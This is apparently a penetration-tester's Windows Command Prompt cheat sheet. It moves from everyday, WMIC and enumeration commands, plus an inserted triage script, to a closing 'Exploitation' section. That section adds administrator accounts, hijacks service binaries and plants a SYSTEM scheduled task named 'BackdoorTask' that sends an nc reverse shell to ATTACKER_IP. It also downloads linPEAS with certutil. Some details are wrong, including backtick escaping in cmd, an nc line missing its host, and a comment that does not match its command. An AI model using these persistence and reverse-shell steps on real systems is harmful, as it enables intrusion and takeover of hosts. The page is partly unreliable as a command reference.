Command Line

The Windows Command Line, also known as the MS Windows Command Prompt or simply CMD, is Windows' default command line interpreter (a command line interface, or CLI). The prompt is provided by the executable cmd.exe, which waits for supported commands typed interactively or runs commands from a script file.

Usage

Only executables located in a directory listed in the Windows PATH can be run by name. The PATH, together with all other environment variables, can be listed with the set command.

:::: General ::::
:: Environment variables
set
:: Version
ver
:: Clear screen
cls

:::: Getting help ::::
:: List available commands
help
:: Get help about given command
set /?

:::: System information ::::
systeminfo
hostname
driverquery

:::: Network information ::::
ipconfig
ipconfig /all
ping HOST.tld
tracert HOST.tld
nslookup HOST.tld

:::: Network connections ::::
netstat
netstat -abon

:::: Disks ::::
chkdsk
sfc /scannow

:::: Folders ::::
cd
cd DIR
cd ..
dir
tree

:::: Files ::::
copy SRC DST
move SRC DST
erase FILE
del FILE
type FILE
:: Write text to a file (overwrites; the quotes are written literally)
echo "SAMPLE" > INTOFILE

more FILE
type FILE | more

:::: Processes ::::
tasklist
tasklist /M
tasklist /FI "imagename eq sshd.exe"
taskkill /PID 1234

:::: Services ::::
net start SERVICENAME
net stop SERVICENAME
sc start SERVICENAME
sc stop SERVICENAME

WMIC

Short for Windows Management Instrumentation Command-line, the command line front end to WMI.

:::: Processes ::::
wmic process list

:::: Services ::::
:: The WQL wildcard for LIKE is %, e.g. 'ssh%' (double it as %% inside a batch file)
wmic service where "name like 'SEARCHSTRING'" get Name,PathName

:::: Software ::::
:: Installed apps / software
wmic product get name,version,vendor
:: Updates
wmic qfe get Caption, Description

:::: Users ::::
:: List users and their SID
wmic useraccount get name,sid

Scripts

Also known as batch files: text files containing commands, written in the batch syntax.

  • Comments start with ::, e.g. :: This is a comment
  • Variables
    • Setting: set name=World
    • Getting: %name%
  • Use backticks to escape special characters: C:\Program` Files` `(x86`)\Something
    • Enclosing a string in quotes also works: "C:\Program Files (x86)\Something"
example.bat
@echo off
set name=World
echo Hello, %name%!
pause

Enumeration

Also called information gathering. All commands below DO NOT change any settings on the system, so they leave minimal traces! Of course, if auditing is enabled, your actions might be logged anyway.

:::: Machine info ::::
:: Local machine settings
net accounts
:: If in domain, password policy, lockout duration, etc.
net accounts /domain

:::: Networking ::::
:: Other systems on same LAN recently communicated with
arp -a

:::: Services ::::
:: Started services
net start
:: All services (sc needs a space after "state=")
sc query state= all
:: Configuration of one service (binary path, start type, account)
sc qc SERVICENAME
:: Listening ports with their owning PID
netstat -noa | findstr "LISTENING"

:::: Updates ::::
:: Open Windows Update
control /name Microsoft.WindowsUpdate

:::: Current user ::::
whoami
:: User details
whoami /user
:: User privileges
whoami /priv
:: User groups
whoami /groups
:: All aforementioned
whoami /all

:::: Other users and groups ::::
:: List user accounts
net user
:: Details of administrator
net user Administrator
:: List local user groups
net localgroup
:: List users that belong to group
net localgroup administrators

:::: Scheduled tasks ::::
:: List all
schtasks
:: List task by name
schtasks /query /tn "\FOLDER\TASKNAME"

:::: Folders ::::
:: Search for a file from "\" root ending with wildcard "*"
dir "\Filename*" /s

:::: Networking ::::
:: host is a Linux/BIND tool, not built into Windows; nslookup is the Windows equivalent
host DOMAIN.TLD
:: Query the MX records of a domain via a specific DNS server
nslookup -type=MX DOMAIN.TLD 1.1.1.1
:: List SMB shares
net share
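The Scripts section above (comments, set and %var%, @echo off) and the read-only enumeration commands of this section come together in the following host triage script, added here as an example and not part of the original page. It assumes only built-in commands; %COMPUTERNAME% is a standard Windows environment variable, and the report path is an optional first argument.

```batch
@echo off
:: Added example (not part of the original page): a read-only triage script
:: that runs the enumeration commands from this page and appends every result
:: to one report file, so a host can be baselined or checked without changing it.
setlocal

:: Report path: first argument if given, otherwise <hostname>_triage.txt in the
:: current folder. COMPUTERNAME is set by Windows itself.
set "report=%COMPUTERNAME%_triage.txt"
if not "%~1"=="" set "report=%~1"

echo ==== Triage of %COMPUTERNAME% started %DATE% %TIME% ==== > "%report%"

:: Each call runs one command and labels its output. The command is passed as a
:: quoted string so that a pipe inside it is only interpreted inside :section.
call :section "Current user, privileges and groups" "whoami /all"
call :section "Password and lockout policy"         "net accounts"
call :section "Local administrators"                "net localgroup administrators"
call :section "Listening ports with owning PID"     "netstat -noa | findstr LISTENING"
call :section "Started services"                    "net start"
call :section "Scheduled tasks"                     "schtasks /query /fo LIST"
call :section "ARP cache (recent LAN neighbours)"   "arp -a"
call :section "Installed updates"                   "wmic qfe get HotFixID,InstalledOn"

echo ==== Triage finished %DATE% %TIME% ==== >> "%report%"
echo Report written to "%report%"
endlocal
exit /b 0

:: Subroutine: %1 is the heading, %2 the command line. %~2 strips the quotes,
:: so the command is expanded and then executed by cmd with its pipe intact;
:: stderr is captured too, so a failing command still leaves a trace in the file.
:section
echo. >> "%report%"
echo :::: %~1 :::: >> "%report%"
%~2 >> "%report%" 2>&1
exit /b 0
```

Run it from an elevated prompt for complete whoami /priv and schtasks output; the report is plain text and can be diffed against an earlier run of the same host.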

Exploitation

:::: Files ::::
move file.exe C:\Windows\Tasks
copy file.exe C:\Windows\Tasks\file.exe

:::: Services ::::
:: sc requires a space after each "option=" (binPath= , start= , obj= )
sc create NEWSERVICE binPath= PATHTOEXE start= auto
sc config SERVICENAME binPath= PATHTOEXE start= auto obj= "LocalSystem"
sc delete BackdoorService

:::: Other users and groups ::::
:: Change user password
net user USER NEWPASSWORD
:: Add account
net user NEWUSER PASSWORD /add
:: Add user to Administrators group
net localgroup Administrators USERNAME /add

:::: Permissions ::::
:: Reassign file ownership to Administrator (takeown needs /f before the path)
takeown /f FILEPATH
:: Grant user full access
icacls FILEPATH /grant Administrator:F
:: Set folder owner to Users
icacls FOLDER /setowner Users
:: Get folder and file permissions
icacls FOLDER
:: Forcefully apply new GPO
gpupdate /force

:::: Scheduled tasks ::::
schtasks /create /sc minute /mo 1 /tn BackdoorTask /tr "C:\tools\nc64.exe -e cmd.exe ATTACKER_IP 1337" /ru SYSTEM

Transfer files from Linux to Windows

:::: Attacker (bash) ::::
nc 4444 < somefile.kirbi
:::: Target (cmd) ::::
:: Start nc -lnvp 4444 locally using LOLBin
certutil.exe -urlcache -split -f "http://10.12.8.10:8000/linPEAS.bat" linPEAS.bat